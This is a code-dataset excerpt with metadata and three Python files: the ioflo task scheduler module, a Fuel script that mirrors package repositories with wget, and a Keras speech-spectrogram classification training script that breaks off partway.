"Apache-2.0",
"MIT"
] | 29 | 2015-01-27T23:28:31.000Z | 2021-05-04T16:37:30.000Z | """skedding.py weightless thread scheduling
"""
#print( "module {0}".format(__name__))
import sys
import os
import time
from collections import deque
from ..aid.consoling import getConsole
console = getConsole()
from ..aid.sixing import *
from ..aid import odict, oset
from .globaling import *
from ..aid import timing
from . import excepting
from . import registering
from . import storing
from . import tasking
from . import building
from ..__metadata__ import __version__
from ..aid.consoling import getConsole
console = getConsole()
class Skedder(object):
"""Schedules weightless tasker objects based on generators.
run method runs the skedder main loop until interrupted or all taskers
completed
taskers is a dictionary of taskers indexed by tasker name
The skedder maintains lists of taskers in various execution states
Each list determines what the skedder does with the tasker.
The skedder has methods that move taskers between the lists and
also notifies taskers of their control
Skedder runs tasker and sends it a control
Tasker runs using control and yields its status
Each tasker as a .desire attribute that indicates what the next
desired control should be.
Each tasker as a .period attribute that indicates how ofter the tasker
should be run
There are three deques the skedder maintains. Each entry in each deque
is a tuple (tasker, retime, period)
tasker is reference to tasker object
retime is time that the tasker should next be run
a retime of zero means runs asap or always
period is the time period between runs
ready = deque of tuples where taskers are ready to be run
If need different priorities then need to add a
ready list for each priority
stopped = deque of tuples where taskers stopped awaiting start
aborted = deque of tuples where taskers aborted can't be restarted
addStoppedTask(tasker) adds tasker to stopped list
addReadyTask(tasker) adds tasker to ready list
Everytime a tasker runs it yields a status that the skedder uses to determine
what to do with the tasker
instance attributes:
.name = skedder name string
.period = time seconds between iterations of skedder
.stamp = current iteration time of skedder
.real = real time IF True ELSE simulated time
.timer = timer to time loops in real time
.elapsed = timer to time elapsed in mission
.houses = list of houses to be scheduled
.ready = deque of tasker tuples ready to run
.aborted = deque of tasker tuples aborted
"""
def __init__( self,
name="skedder",
period=0.125,
stamp=0.0,
real=False,
retro=True,
filepath='',
behaviors=None,
username='',
password='',
mode=None,
houses=None,
metas=None,
preloads=None, ):
"""
Initialize Skedder instance.
parameters:
name = name string
period = iteration period
stamp = initial time stamp value
real = time mode real time True or simulated time False
retro = shift timers if retrograded system clock detected
filepath = filepath to build file
behaviors = list of pathnames to packages with external behavior modules
username = username
password = password
mode = parsing mode
houses = list of houses
metas = list of triples of (name, path, data) where
name = name string of house attribute, path = path string, data = odict
preloads = list of duples of (path, data) to preload Store where
path = path string, data = odict
"""
self.name = name
self.period = float(abs(period))
self.stamp = float(abs(stamp))
#real time or sim time mode
self.real = True if real else False
self.timer = timing.MonoTimer(duration = self.period, retro=retro)
self.elapsed = timing.MonoTimer(retro=retro)
self.filepath = os.path.abspath(filepath)
self.plan = os.path.split(self.filepath)[1]
self.behaviors = behaviors or []
self.username = username
self.password = password
self.mode = mode or []
self.houses = houses or []
#Meta data format is list of triples of form (name, path, value)
self.metas = [
("name", "meta.name", odict(value=self.name)),
("period", "meta.period", odict(value=self.period)),
("real", "meta.real", odict(value=self.real)),
("mode", "meta.mode", odict(value=self.mode)), #applied mode logging only
("plan", "meta.plan", odict(value=self.plan)),
("filepath", "meta.filepath", odict(value=self.filepath)),
("behaviors", "meta.behaviors", odict(value=self.behaviors)),
("credentials", "meta.credentials",
odict([('username', self.username), ('password', self.password)])),
("failure", "meta.failure", odict(value="")), # for failure reporting
("framers", "meta.framers", odict()), # for failure reporting
("taskables", "meta.taskables", odict(value=oset())), # to add taskables at runtime ordered
]
if metas:
self.metas.extend(metas)
self.preloads = [
("ioflo.version", odict(value=__version__)),
("ioflo.platform",
odict([("os", sys.platform),
("python", "{0}.{1}.{2}".format(*sys.version_info)),] )),
]
if preloads:
self.preloads.extend(preloads)
self.ready = deque() # deque of taskers in run order
self.aborted = deque() # deque of aborted taskers
self.built = False # True when successfully built
def addReadyTask(self, tasker):
"""
Prepare tasker to be started and add to ready list
"""
if tasker.schedule == ACTIVE:
tasker.desire = START
else:
tasker.desire = STOP
tasker.status = STOPPED
retime = tasker.store.stamp
period = tasker.period
trp = (tasker, retime, period)
self.ready.append(trp)
console.profuse(" Add ready: {0} retime: {1} period: {2} desire {3}\n".format(
tasker.name, retime, period, ControlNames[tasker.desire]))
def build(self, filepath='', mode=None, metas=None, preloads=None):
""" Build houses from file given by filepath """
console.terse("Building Houses for Skedder '{0}' ...\n".format(self.name))
self.built = False
#use parameter otherwise use inited value
if filepath:
self.filepath = filepath
if mode:
self.mode.extend(mode)
if metas:
self.metas.extend(metas)
if preloads:
self.preloads.extend(preloads)
b = building.Builder(fileName = self.filepath,
mode=self.mode,
metas = self.metas,
preloads =self.preloads,
behaviors=self.behaviors)
if not b.build():
return False
self.built = True
self.houses = b.houses
for house in self.houses:
console.profuse("Meta Data for House '{0}':\n{1}\n".format(
house.name, house.metas))
return True
def run(self, growable=False):
"""runs all generator taskers in running list by calling next() method.
Keyboard interrupt (cntl-c) to end forever loop
Since finally clause closes taskers they must be restarted before
run can be executed again
if growable is True then allow adding new taskers at runtime
via house metas['taskables']
"""
console.terse("Starting Skedder '{0}' ...\n".format(self.name))
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
("Initialized store {0}: stamp = {1} with {2}\n".format(
house.store.name, house.store.stamp, stamp))
for tasker in house.taskables:
self.addReadyTask(tasker)
console.profuse("Ready Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.ready])))
console.profuse("Aborted Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.aborted])))
self.timer.restart()
self.elapsed.restart()
#make local reference for speed put out side loop?
ready = self.ready
#stopped = self.stopped
aborted = self.aborted
try: #so always clean up resources if exception
while True:
try: #CNTL-C generates keyboardInterrupt to break out of while loop
console.profuse("\nRunning Skedder '{0}' at stamp = {1} real elapsed = {2:0.4f}\n".format(
self.name, self.stamp, self.elapsed.elapsed))
more = False #are any taskers RUNNING or STARTED
for i in range(len(ready)): #attempt to run each ready tasker
tasker, retime, period = ready.popleft() #pop it off
if retime > stamp: #not time yet
ready.append((tasker, retime, period)) #reappend it
status = tasker.status
else: #run it
try:
status = tasker.runner.send(tasker.desire)
if status == ABORTED: #aborted so abort tasker
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Self Aborted: {0}\n".format(tasker.name))
else:
ready.append((tasker,
retime + tasker.period,
tasker.period)) # append allows for period change
except StopIteration: #generator returned instead of yielded
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Aborted due to StopIteration: {0}\n".format(tasker.name))
if status == RUNNING or status == STARTED:
more = True
if growable:
# todo from each house.metas fetch new taskables
# add to ready
pass
if not ready: #no pending taskers so done
console.terse("No ready taskers. Shutting down skedder ...\n")
break
if not more: #all taskers stopped or aborted
console.terse("No running or started taskers. Shutting down skedder ...\n")
break
#update time stamps
if self.real:
console.profuse(" Time remaining skedder = {0:0.4f}\n".format(self.timer.remaining))
while not self.timer.expired:
time.sleep(self.timer.remaining)
self.timer.repeat()
self.stamp += self.period
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
except KeyboardInterrupt: #CNTL-C shutdown skedder
console.terse("KeyboardInterrupt forcing shutdown of Skedder ...\n")
break
except SystemExit: #User know why shutting down
console.terse("SystemExit forcing shutdown of Skedder ...\n")
raise
except Exception: #Let user know what exception caused shutdoen
console.terse("Surprise exception forcing shutdown of Skedder ...\n")
raise
console.terse("Total elapsed real time = {0:0.4f}\n".format(self.elapsed.elapsed))
finally: #finally clause always runs regardless of exception or not
#Abort any running taskers to reclaim resources
#Stopped or aborted taskers should have already released resources
#if last run tasker exited due to exception then try finally clause in
#its generator is responsible for releasing resources
console.terse("Aborting all ready Taskers ...\n")
for i in range(len(ready)): #run each ready tasker once
tasker,retime,period = ready.popleft() #pop it off
try:
status = tasker.runner.send(ABORT)
console.terse("Tasker '{0}' aborted\n".format(tasker.name))
except StopIteration: #generator returned instead of yielded
console.terse("Tasker '{0}' generator already exited\n".format(tasker.name))
#tasker.runner.close() #kill generator
if console._verbosity >= console.Wordage.concise:
for house in self.houses:
#show store hierarchy
console.concise( "\nData Store for {0}\n".format(house.name))
house.store.expose(valued=(console._verbosity >= console.Wordage.terse))
def Test(real = False, verbose = False):
"""Module Common self test
"""
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = tasking.Tasker(name = 't1', store = house.store)
t2 = tasking.Tasker(name = 't2', store = house.store)
t3 = tasking.Tasker(name = 't3', store = house.store, period = 0.125)
t4 = tasking.Tasker(name = 't4', store = house.store, period = 0.125)
t5 = tasking.Tasker(name = 't5', store = house.store, period = 0.5)
t6 = tasking.Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestTasker", period = 0.125, real = real, houses = [house])
skedder.run()
def TestProfile(real = False, verbose = False):
"""Module Common self test
"""
import cProfile
import pstats
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = Tasker(name = 't1', store = house.store)
t2 = Tasker(name = 't2', store = house.store)
t3 = Tasker(name = 't3', store = house.store, period = 0.125)
t4 = Tasker(name = 't4', store = house.store, period = 0.125)
t5 = Tasker(name = 't5', store = house.store, period = 0.5)
t6 = Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestSkedder", period = 0.125, real = real, houses = [house])
#skedder.run()
cProfile.runctx('skedder.run()',globals(),locals(), './test/profiles/skeddertest')
p = pstats.Stats('./test/profiles/skeddertest')
p.sort_stats('time').print_stats()
p.print_callers()
p.print_callees()
if __name__ == "__main__":
Test()
| 37.600467 | 118 | 0.563723 | """skedding.py weightless thread scheduling
"""
#print( "module {0}".format(__name__))
import sys
import os
import time
from collections import deque
from ..aid.consoling import getConsole
console = getConsole()
from ..aid.sixing import *
from ..aid import odict, oset
from .globaling import *
from ..aid import timing
from . import excepting
from . import registering
from . import storing
from . import tasking
from . import building
from ..__metadata__ import __version__
from ..aid.consoling import getConsole
console = getConsole()
class Skedder(object):
"""Schedules weightless tasker objects based on generators.
run method runs the skedder main loop until interrupted or all taskers
completed
taskers is a dictionary of taskers indexed by tasker name
The skedder maintains lists of taskers in various execution states
Each list determines what the skedder does with the tasker.
The skedder has methods that move taskers between the lists and
also notifies taskers of their control
Skedder runs tasker and sends it a control
Tasker runs using control and yields its status
Each tasker as a .desire attribute that indicates what the next
desired control should be.
Each tasker as a .period attribute that indicates how ofter the tasker
should be run
There are three deques the skedder maintains. Each entry in each deque
is a tuple (tasker, retime, period)
tasker is reference to tasker object
retime is time that the tasker should next be run
a retime of zero means runs asap or always
period is the time period between runs
ready = deque of tuples where taskers are ready to be run
If need different priorities then need to add a
ready list for each priority
stopped = deque of tuples where taskers stopped awaiting start
aborted = deque of tuples where taskers aborted can't be restarted
addStoppedTask(tasker) adds tasker to stopped list
addReadyTask(tasker) adds tasker to ready list
Everytime a tasker runs it yields a status that the skedder uses to determine
what to do with the tasker
instance attributes:
.name = skedder name string
.period = time seconds between iterations of skedder
.stamp = current iteration time of skedder
.real = real time IF True ELSE simulated time
.timer = timer to time loops in real time
.elapsed = timer to time elapsed in mission
.houses = list of houses to be scheduled
.ready = deque of tasker tuples ready to run
.aborted = deque of tasker tuples aborted
"""
def __init__( self,
name="skedder",
period=0.125,
stamp=0.0,
real=False,
retro=True,
filepath='',
behaviors=None,
username='',
password='',
mode=None,
houses=None,
metas=None,
preloads=None, ):
"""
Initialize Skedder instance.
parameters:
name = name string
period = iteration period
stamp = initial time stamp value
real = time mode real time True or simulated time False
retro = shift timers if retrograded system clock detected
filepath = filepath to build file
behaviors = list of pathnames to packages with external behavior modules
username = username
password = password
mode = parsing mode
houses = list of houses
metas = list of triples of (name, path, data) where
name = name string of house attribute, path = path string, data = odict
preloads = list of duples of (path, data) to preload Store where
path = path string, data = odict
"""
self.name = name
self.period = float(abs(period))
self.stamp = float(abs(stamp))
#real time or sim time mode
self.real = True if real else False
self.timer = timing.MonoTimer(duration = self.period, retro=retro)
self.elapsed = timing.MonoTimer(retro=retro)
self.filepath = os.path.abspath(filepath)
self.plan = os.path.split(self.filepath)[1]
self.behaviors = behaviors or []
self.username = username
self.password = password
self.mode = mode or []
self.houses = houses or []
#Meta data format is list of triples of form (name, path, value)
self.metas = [
("name", "meta.name", odict(value=self.name)),
("period", "meta.period", odict(value=self.period)),
("real", "meta.real", odict(value=self.real)),
("mode", "meta.mode", odict(value=self.mode)), #applied mode logging only
("plan", "meta.plan", odict(value=self.plan)),
("filepath", "meta.filepath", odict(value=self.filepath)),
("behaviors", "meta.behaviors", odict(value=self.behaviors)),
("credentials", "meta.credentials",
odict([('username', self.username), ('password', self.password)])),
("failure", "meta.failure", odict(value="")), # for failure reporting
("framers", "meta.framers", odict()), # for failure reporting
("taskables", "meta.taskables", odict(value=oset())), # to add taskables at runtime ordered
]
if metas:
self.metas.extend(metas)
self.preloads = [
("ioflo.version", odict(value=__version__)),
("ioflo.platform",
odict([("os", sys.platform),
("python", "{0}.{1}.{2}".format(*sys.version_info)),] )),
]
if preloads:
self.preloads.extend(preloads)
self.ready = deque() # deque of taskers in run order
self.aborted = deque() # deque of aborted taskers
self.built = False # True when successfully built
def addReadyTask(self, tasker):
"""
Prepare tasker to be started and add to ready list
"""
if tasker.schedule == ACTIVE:
tasker.desire = START
else:
tasker.desire = STOP
tasker.status = STOPPED
retime = tasker.store.stamp
period = tasker.period
trp = (tasker, retime, period)
self.ready.append(trp)
console.profuse(" Add ready: {0} retime: {1} period: {2} desire {3}\n".format(
tasker.name, retime, period, ControlNames[tasker.desire]))
def build(self, filepath='', mode=None, metas=None, preloads=None):
""" Build houses from file given by filepath """
console.terse("Building Houses for Skedder '{0}' ...\n".format(self.name))
self.built = False
#use parameter otherwise use inited value
if filepath:
self.filepath = filepath
if mode:
self.mode.extend(mode)
if metas:
self.metas.extend(metas)
if preloads:
self.preloads.extend(preloads)
b = building.Builder(fileName = self.filepath,
mode=self.mode,
metas = self.metas,
preloads =self.preloads,
behaviors=self.behaviors)
if not b.build():
return False
self.built = True
self.houses = b.houses
for house in self.houses:
console.profuse("Meta Data for House '{0}':\n{1}\n".format(
house.name, house.metas))
return True
def run(self, growable=False):
"""runs all generator taskers in running list by calling next() method.
Keyboard interrupt (cntl-c) to end forever loop
Since finally clause closes taskers they must be restarted before
run can be executed again
if growable is True then allow adding new taskers at runtime
via house metas['taskables']
"""
console.terse("Starting Skedder '{0}' ...\n".format(self.name))
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
("Initialized store {0}: stamp = {1} with {2}\n".format(
house.store.name, house.store.stamp, stamp))
for tasker in house.taskables:
self.addReadyTask(tasker)
console.profuse("Ready Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.ready])))
console.profuse("Aborted Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.aborted])))
self.timer.restart()
self.elapsed.restart()
#make local reference for speed put out side loop?
ready = self.ready
#stopped = self.stopped
aborted = self.aborted
try: #so always clean up resources if exception
while True:
try: #CNTL-C generates keyboardInterrupt to break out of while loop
console.profuse("\nRunning Skedder '{0}' at stamp = {1} real elapsed = {2:0.4f}\n".format(
self.name, self.stamp, self.elapsed.elapsed))
more = False #are any taskers RUNNING or STARTED
for i in range(len(ready)): #attempt to run each ready tasker
tasker, retime, period = ready.popleft() #pop it off
if retime > stamp: #not time yet
ready.append((tasker, retime, period)) #reappend it
status = tasker.status
else: #run it
try:
status = tasker.runner.send(tasker.desire)
if status == ABORTED: #aborted so abort tasker
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Self Aborted: {0}\n".format(tasker.name))
else:
ready.append((tasker,
retime + tasker.period,
tasker.period)) # append allows for period change
except StopIteration: #generator returned instead of yielded
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Aborted due to StopIteration: {0}\n".format(tasker.name))
if status == RUNNING or status == STARTED:
more = True
if growable:
# todo from each house.metas fetch new taskables
# add to ready
pass
if not ready: #no pending taskers so done
console.terse("No ready taskers. Shutting down skedder ...\n")
break
if not more: #all taskers stopped or aborted
console.terse("No running or started taskers. Shutting down skedder ...\n")
break
#update time stamps
if self.real:
console.profuse(" Time remaining skedder = {0:0.4f}\n".format(self.timer.remaining))
while not self.timer.expired:
time.sleep(self.timer.remaining)
self.timer.repeat()
self.stamp += self.period
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
except KeyboardInterrupt: #CNTL-C shutdown skedder
console.terse("KeyboardInterrupt forcing shutdown of Skedder ...\n")
break
except SystemExit: #User know why shutting down
console.terse("SystemExit forcing shutdown of Skedder ...\n")
raise
except Exception: #Let user know what exception caused shutdoen
console.terse("Surprise exception forcing shutdown of Skedder ...\n")
raise
console.terse("Total elapsed real time = {0:0.4f}\n".format(self.elapsed.elapsed))
finally: #finally clause always runs regardless of exception or not
#Abort any running taskers to reclaim resources
#Stopped or aborted taskers should have already released resources
#if last run tasker exited due to exception then try finally clause in
#its generator is responsible for releasing resources
console.terse("Aborting all ready Taskers ...\n")
for i in range(len(ready)): #run each ready tasker once
tasker,retime,period = ready.popleft() #pop it off
try:
status = tasker.runner.send(ABORT)
console.terse("Tasker '{0}' aborted\n".format(tasker.name))
except StopIteration: #generator returned instead of yielded
console.terse("Tasker '{0}' generator already exited\n".format(tasker.name))
#tasker.runner.close() #kill generator
if console._verbosity >= console.Wordage.concise:
for house in self.houses:
#show store hierarchy
console.concise( "\nData Store for {0}\n".format(house.name))
house.store.expose(valued=(console._verbosity >= console.Wordage.terse))
def Test(real = False, verbose = False):
"""Module Common self test
"""
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = tasking.Tasker(name = 't1', store = house.store)
t2 = tasking.Tasker(name = 't2', store = house.store)
t3 = tasking.Tasker(name = 't3', store = house.store, period = 0.125)
t4 = tasking.Tasker(name = 't4', store = house.store, period = 0.125)
t5 = tasking.Tasker(name = 't5', store = house.store, period = 0.5)
t6 = tasking.Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestTasker", period = 0.125, real = real, houses = [house])
skedder.run()
def TestProfile(real = False, verbose = False):
"""Module Common self test
"""
import cProfile
import pstats
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = Tasker(name = 't1', store = house.store)
t2 = Tasker(name = 't2', store = house.store)
t3 = Tasker(name = 't3', store = house.store, period = 0.125)
t4 = Tasker(name = 't4', store = house.store, period = 0.125)
t5 = Tasker(name = 't5', store = house.store, period = 0.5)
t6 = Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestSkedder", period = 0.125, real = real, houses = [house])
#skedder.run()
cProfile.runctx('skedder.run()',globals(),locals(), './test/profiles/skeddertest')
p = pstats.Stats('./test/profiles/skeddertest')
p.sort_stats('time').print_stats()
p.print_callers()
p.print_callees()
if __name__ == "__main__":
Test()
| 0 | 0 | 0 |
6bbb09399af12973f203e06cfe0dab224ca66d09 | 6,549 | py | Python | fuel-package-updates.py | artem-panchenko/fuel-updates | 87abddfeae749ee81c58328410f842ccd9afe3dc | [
"Apache-2.0"
] | null | null | null | fuel-package-updates.py | artem-panchenko/fuel-updates | 87abddfeae749ee81c58328410f842ccd9afe3dc | [
"Apache-2.0"
] | null | null | null | fuel-package-updates.py | artem-panchenko/fuel-updates | 87abddfeae749ee81c58328410f842ccd9afe3dc | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import re
import subprocess
import zlib
from optparse import OptionParser
from urllib2 import HTTPError
from urllib2 import urlopen
from urlparse import urlparse
from xml.dom.minidom import parseString
logger = logging.getLogger(__name__)
if __name__ == '__main__':
main()
| 37.210227 | 79 | 0.619331 | # Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import re
import subprocess
import zlib
from optparse import OptionParser
from urllib2 import HTTPError
from urllib2 import urlopen
from urlparse import urlparse
from xml.dom.minidom import parseString
logger = logging.getLogger(__name__)
class Settings(object):
supported_distros = ('centos', 'ubuntu')
supported_releases = ('2014.2-6.1')
updates_destinations = {
'centos': r'/var/www/nailgun/{0}/centos/updates',
'ubuntu': r'/var/www/nailgun/{0}/ubuntu/updates'
}
class UpdatePackagesException(Exception):
pass
def exec_cmd(cmd):
logger.debug('Execute command "%s"', cmd)
child = subprocess.Popen(
cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
logger.debug('Stdout and stderr of command "%s":', cmd)
for line in child.stdout:
logger.debug(line.rstrip())
return _wait_and_check_exit_code(cmd, child)
def _wait_and_check_exit_code(cmd, child):
child.wait()
exit_code = child.returncode
logger.debug('Command "%s" was executed', cmd)
return exit_code
def get_repository_packages(remote_repo_url, distro):
repo_url = urlparse(remote_repo_url)
packages = []
if distro in ('ubuntu',):
packages_url = '{0}/Packages'.format(repo_url.geturl())
pkgs_raw = urlopen(packages_url).read()
for pkg in pkgs_raw.split('\n'):
match = re.search(r'^Package: (\S+)\s*$', pkg)
if match:
packages.append(match.group(1))
elif distro in ('centos',):
packages_url = '{0}/repodata/primary.xml.gz'.format(repo_url.geturl())
pkgs_xml = parseString(zlib.decompressobj(zlib.MAX_WBITS | 32).
decompress(urlopen(packages_url).read()))
for pkg in pkgs_xml.getElementsByTagName('package'):
packages.append(
pkg.getElementsByTagName('name')[0].firstChild.nodeValue)
return packages
def mirror_remote_repository(remote_repo_url, local_repo_path):
repo_url = urlparse(remote_repo_url)
cut_dirs = len(repo_url.path.strip('/').split('/'))
download_cmd = ('wget --recursive --no-parent --no-verbose --reject "index'
'.html*,*.gif,*.key,*.gpg" --exclude-directories "{pwd}/re'
'pocache" --directory-prefix {path} -nH --cut-dirs={cutd} '
'{url}').format(pwd=repo_url.path.rstrip('/'),
path=local_repo_path,
cutd=cut_dirs,
url=repo_url.geturl())
if exec_cmd(download_cmd) != 0:
raise UpdatePackagesException('Mirroring of remote packages'
' repository failed!')
def main():
settings = Settings()
sh = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
logger.setLevel(logging.INFO)
parser = OptionParser(
description="Pull updates for a given release of Fuel based on "
"the provided URL."
)
parser.add_option('-d', '--distro', dest='distro', default=None,
help='Linux distribution name (required)')
parser.add_option('-r', '--release', dest='release', default=None,
help='Fuel release name (required)')
parser.add_option("-u", "--url", dest="url", default="",
help="Remote repository URL (required)")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="Enable debug output")
(options, args) = parser.parse_args()
if options.verbose:
logger.setLevel(logging.DEBUG)
if options.distro not in settings.supported_distros:
raise UpdatePackagesException(
'Linux distro "{0}" is not supported. Please specify one of the '
'following: "{1}". See help (--help) for details.'.format(
options.distro, ', '.join(settings.supported_distros)))
if options.release not in settings.supported_releases:
raise UpdatePackagesException(
'Fuel release "{0}" is not supported. Please specify one of the '
'following: "{1}". See help (--help) for details.'.format(
options.release, ', '.join(settings.supported_releases)))
if 'http' not in urlparse(options.url):
raise UpdatePackagesException(
'Repository url "{0}" does not look like valid URL. '
'See help (--help) for details.'.format(options.url))
updates_path = settings.updates_destinations[options.distro].format(
options.release)
if not os.path.exists(updates_path):
os.makedirs(updates_path)
logger.info('Checking remote repository...')
try:
pkgs = get_repository_packages(options.url, options.distro)
except HTTPError as e:
if e.code == 404:
raise UpdatePackagesException(
'Remote repository does not contain packages'
' metadata ({0})!'.format(options.distro))
else:
raise
if len(pkgs) < 1:
raise UpdatePackagesException('Remote "{0}" repository does not '
'contain any packages.')
logger.debug('Remote repository contains next packages: {0}'.format(pkgs))
logger.info('Started mirroring remote repository...')
mirror_remote_repository(options.url, updates_path)
logger.info('Remote repository "{url}" for "{release}" ({distro}) was '
'successfuly mirrored to {path} folder.'.format(
url=options.url,
release=options.release,
distro=options.distro,
path=updates_path))
if __name__ == '__main__':
main()
| 5,198 | 266 | 161 |
59d5cdcca3e8dcc86bf49dbd3064cc9bfffae240 | 12,461 | py | Python | 11_networks-complite-05.py | Accioy/voice-singal-classification | b6744af9732fd38c41cf3cbf11c170a962cee6c7 | [
"MIT"
] | null | null | null | 11_networks-complite-05.py | Accioy/voice-singal-classification | b6744af9732fd38c41cf3cbf11c170a962cee6c7 | [
"MIT"
] | null | null | null | 11_networks-complite-05.py | Accioy/voice-singal-classification | b6744af9732fd38c41cf3cbf11c170a962cee6c7 | [
"MIT"
] | null | null | null | """
技术要点:1、创建基于声谱图的卷积神经网络模型(十分类),本文件为第五版本
2、三种功能选择:训练并保存模型、评估模型、类别预测
3、三种训练方法:2d卷积、沿时间卷积、沿频率卷积
4、添加了绘制准确率和损失值变化曲线的代码;
5、注释掉早停法代码行;
6、模型训练回调函数改为logs_loss。
改进方面:音频预处理后再训练
运行结果:300轮训练后,准确率可达到84%
准确率和损失值曲线效果较好,其他曲线效果不佳
"""
import numpy as np
from scipy import signal
import scipy.io.wavfile as wav
import os
import time
import sys
from keras.utils.np_utils import to_categorical
import matplotlib.pyplot as plt
# import skimage.io
import platform
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
config = tf.ConfigProto()
config.gpu_options.allow_growth=True #不全部占满显存, 按需分配
session = tf.Session(config=config)
plt.switch_backend('agg')
a = platform.platform()
if "Windows" in a:
splitchar = "\\"
elif "Linux" in a:
splitchar = "/"
print('\n', a, '\n')
ROOT_DIR = os.path.abspath('.')
wav_path = os.path.join(ROOT_DIR, "ALL_hd_random")
##########################################################################
##########################################################################
number_of_classes = 10
# 读取文件
train_files = get_wav_files(os.path.join(wav_path, "train"))
test_files = get_wav_files(os.path.join(wav_path, "test"))
# 数据预处理
train_x, train_y, max_freq, max_time = data_preprocess(train_files, number_of_classes)
test_x, test_y, max_freq, max_time = data_preprocess(test_files, number_of_classes)
import random
randnum = random.randint(0, 100)
random.seed(randnum)
random.shuffle(train_x)
random.seed(randnum)
random.shuffle(train_y)
from keras.models import Sequential, load_model
from keras.layers import MaxPool1D, Conv1D, Conv2D, MaxPool2D, Flatten, Dense, BatchNormalization, Dropout
from keras.callbacks import EarlyStopping
from keras.optimizers import RMSprop
from keras.metrics import categorical_accuracy
from keras import regularizers
import keras
task = 'train' # train or evaluate or predict
if task == 'train':
model = Sequential()
# model.add(Conv2D(filters=16,kernel_size=(3,3), input_shape=(max_time,max_freq,1),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=8,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=4,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Flatten())
# #model.add(Dropout(0.5))
# model.add(Dense(128, activation='relu'))
# #model.add(Dropout(0.5))
# model.add(Dense(number_of_classes, activation='softmax'))
model.add(Conv1D(max_freq, 10, input_shape=(max_time, max_freq), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Conv1D(max_freq, 4, activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(max_freq, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(number_of_classes, activation='softmax'))
model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=['categorical_accuracy'])
# 函数开始时创建盛放loss与acc的容器
# 按照batch来进行追加数据
# 绘图,这里把每一种曲线都单独绘图,若想把各种曲线绘制在一张图上的话可修改此方法
# 由于这里的绘图设置的是5s绘制一次,当训练结束后得到的图可能不是一个完整的训练过程
# (最后一次绘图结束,又训练了0-5秒的时间)
# 所以这里的方法会在整个训练结束以后调用
logs_loss = LossHistory()
# model=load_model('voice_recog_spectrogram_new1.h5')
# print(model.summary())
# model.pop()
# model.add(Dense(number_of_classes, activation='softmax',name='output'))
# model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=[categorical_accuracy])
# early_stopping = EarlyStopping(monitor='val_loss', patience=10)
model.fit(train_x, train_y, batch_size=20, epochs=300, validation_split=0.1, callbacks=[logs_loss]) # callbacks=[early_stopping]
# 保存模型。
model.save('voice_recog_spectrogram_preprcsess_300epochs_04.h5')
logs_loss.end_draw()
"""第一种方法:训练完成时直接绘制acc和loss变化曲线
train_log = model.fit_generator(train_generator,
steps_per_epoch = nb_train_samples// batch_size,
epochs = epochs,
validation_data = validation_generator,
validation_steps =nb_validation_samples // batch_size,
)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
